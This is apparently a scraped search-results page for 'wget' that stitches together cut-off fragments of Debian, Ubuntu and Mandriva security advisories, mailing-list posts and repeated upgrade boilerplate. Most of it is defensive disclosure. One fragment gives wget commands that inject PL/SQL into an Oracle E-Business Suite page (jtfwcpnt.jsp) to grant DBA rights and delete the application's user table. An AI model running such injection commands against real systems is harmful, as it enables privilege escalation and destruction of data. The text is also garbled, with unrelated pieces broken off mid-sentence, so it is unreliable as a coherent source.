Next Page >>
wget
//OK, it is, lets register the IP in a variable for later use:
$ GoogleHost=74.125.65.106
//Lets verify it is working now:
$ wget http://$GoogleHost/ -O /dev/null -T 5
- --2009-08-16 21:15:05-- http://74.125.65.106/
Connecting to 74.125.65.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `/dev/null'
attackers to conduct man-in-the-middle attacks.
Background
==========
GNU Wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols.
Affected packages
=================
#2010-001 multiple http client unexpected download filename vulnerability
Description:
The lftp, wget and lwp-download applications are ftp/http clients and file
transfer tools supporting various network protocols. The lwp-download
script is shipped along with the libwww-perl library.
Unsafe behaviours have been found in lftp and lwp-download handling the
Content-Disposition header in conjunction with the 'suggested filename'
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
===========================================================
Ubuntu Security Notice USN-842-1 October 06, 2009
wget vulnerability
CVE-2009-3490
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Debian Security Advisory DSA-2088-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
August 05, 2010 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : wget
Vulnerability : missing input sanitization
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2010-2252
Debian Bug : 590296
overwriting of local files.
Background
==========
GNU Wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols.
Affected packages
=================
Problem Description:
A vulnerability has been found and corrected in wget:
GNU Wget before 1.12 does not properly handle a '\0' (NUL) character
in a domain name in the Common Name field of an X.509 certificate,
which allows man-in-the-middle remote attackers to spoof arbitrary SSL
servers via a crafted certificate issued by a legitimate Certification
Authority, a related issue to CVE-2009-2408 (CVE-2009-3490).
Debian Security Advisory DSA-1904-1 security@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
October 09, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : wget
Vulnerability : insufficient input validation
Problem type : remote
Debian-specific: no
Debian bug : 549293
CVE ID : CVE-2009-3490
Problem Description:
A vulnerability has been found and corrected in wget:
GNU Wget 1.12 and earlier uses a server-provided filename instead of
the original URL to determine the destination filename of a download,
which allows remote servers to create or overwrite arbitrary files
via a 3xx redirect to a URL with a .wgetrc filename followed by a
3xx redirect to a URL with a crafted filename, and possibly execute
arbitrary code as a consequence of writing to a dotfile in a home
Hi,
Here's a summary of relevant postings to oss-security and bug-wget.
Unofficial patch for wget, by Florian Weimer:
http://www.openwall.com/lists/oss-security/2010/05/17/2
PoC attack on a wget cron job resulting in a .bash_profile overwrite:
http://www.openwall.com/lists/oss-security/2010/05/18/13
Mandriva Linux Security Advisory MDVSA-2009:206
http://www.mandriva.com/security/
_______________________________________________________________________
Package : wget
Date : August 18, 2009
Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
EXPLOIT
=======
Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.
Substitute port 7002 to target Keys Server instead of Protection
Server.
This example will retrieve the C:\boot.ini file.
script called jtfwcpnt.jsp which receives a parameter called "query". I
think that no other explanation is required. Anyway, this is a simple
"exploit" extracted from the presentation:
$ export TARGET=”http://<target>:<port>/OA_HTML”
$ wget -O - “$TARGET/OA.jsp” "$TARGET/jtfwcpnt.jsp?query=begin%20execute
%20immediate%20'grant%20dba%20to%20mom';%20end;”
$ wget -O - “$TARGET/OA.jsp” "$TARGET/jtfwcpnt.jsp?query=begin%20execute
%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;”
Just in case you don't want to view the slides online or you hate (or
> # emerge --ask --oneshot --verbose ">=net-misc/openswan-2.4.13-r2"
Ahh. gentoo still uses the openswan-2.4.x version which has been EOL since
early 2008.
Also note that to problematic use was in wget -O. Perhaps one should talk
to the wget people about symlink attack in their code instead?
Paul
The version of a software to move to stable or to remain in unstable
Gentoo is at the discretion of the maintainer, so I cannot comment on
the reasons for this.
> Also note that to problematic use was in wget -O. Perhaps one should
> talk to the wget people about symlink attack in their code instead?
>
> Paul
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your qt4-x11 packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
user-mode-linux 2.6.26-1um-2+22lenny1
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your nginx package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your xulrunner packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your php5 packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your otrs2 packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your phpgroupware packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
application using the library.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your audiofile packages.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
Next Page>>
|
